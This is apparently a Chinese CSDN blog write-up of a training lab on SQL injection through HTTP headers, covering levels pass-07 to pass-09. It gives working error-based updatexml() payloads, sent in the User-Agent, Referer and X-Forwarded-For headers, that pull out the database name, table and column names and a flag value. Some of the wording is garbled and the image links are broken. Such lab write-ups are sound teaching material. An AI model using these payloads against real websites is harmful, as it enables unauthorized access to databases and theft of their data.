SQL注入(head注入)---zkaq

本文详细解析了如何通过头部注入技术,利用$_SERVER['HTTP_REFERER']和不同的USER_AGENT来探测数据库信息,包括数据库名、表名和字段名,以及如何执行SQL注入获取敏感数据。案例涉及pass-07至pass-09的不同场景和应对策略。
摘要由CSDN通过智能技术生成

1.概念

头部插件:下面的情况信息与网站请求的插件就可以试用

常见的超变量:

  • $ _ REQUEST(获取GET/POST/COOKIE)COOKIE在新版本已经无法获取到- $ _ POST(获取POST传参)- $ _ GET(获取GET的参)- $ _COOKIE(COOKIE的值)- $ _SERVER(包含类别信息的路径(header)、以及脚本位置)等信息的路径)

$_SERVER 常见的用法:

  • $_SERVER[‘HTTP_REFERER’] 获取Refer请求用户头数据- $_SERVER[“HTTP_USER_AGENT”] 获取用户相关信息,包括用户浏览器、操作等信息。- $_SERVER[“REMOTE_ADDR”] 浏览网页的ip。

2.靶场

1.pass-07—他注入(一)

-查看源头,发现头已经对进入特殊的特征源进行了过滤

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来上传(img-IP8yTOUa-1650555601448)(https://img-blog.csdnimg.cn/img_convert/b20f1ac72e244171457b0007d421fc77.png)]

-源中头中头中的USER_AGENT与数据库有用的密码试探12个USER_AGENT入手试用-打先饱爆破,获取用户名及密码

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来上传(img-R2W23MHu-1650555601451)(https://img-blog.csdnimg.cn/img_convert/247b927f4093a19d6e9a744f93614a7e.png)]

-使用USER_AGENT注入获取数据库名: ’ or updatexml(1,concat(‘!’,database()),1),1) – wq - updatexml() :更新xml文档的函数

语法:updatexml(目标xml内容,xml文档路径,更新的内容)

得到数据库名head_error

  • 获取表名 :’ or updatexml(1,concat(‘!’,(select table_name from information_schema.tables where table_schema=‘head_error’ limit 0,1)),1),1) – qwe

得到表名:flag_head

  • 查询字段名 : ’ or updatexml(1,concat(‘!’,(select column_name from information_schema.columns where table_name=‘flag_head’ limit 0,1)),1),1) – qwe

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mgt7s5ZS-1650555601452)( https://img-blog.csdnimg.cn/img_convert/b6bfdbedcb137d4cdcdf44a0ce9eb29c.png )]

得到两个名字:Id flag_h1

–查询表中数据:’ or updatexml(1,concat(‘!’,(select flag_h1 from flag_head limit 0,1)),1),1) — qwe

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来上传(img-iH5BUbLS-1650555601453)(https://img-blog.csdnimg.cn/img_convert/dd24d560f110a277eea2a83b83820b0e.png)]

迟到

2.pass-08—他注入(二)

-查看源代码

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来上传(img-SEShPzQm-1650555601454)(https://img-blog.csdnimg.cn/img_convert/ff15a0a4e568d5b39e30d50299e522c3.png)]

同上一题一样,修改heads的refer进行智能测试

3.pass-09 —头部注入(三)

-查看源代码

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来上传(img-870mBdUi-1650555601455)(https://img-blog.csdnimg.cn/img_convert/53e0052181564cd9c1cd43fb7e46cb36.png)]

同上题一样,修改header的X_FORWARDED_FOR进行智能测试

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值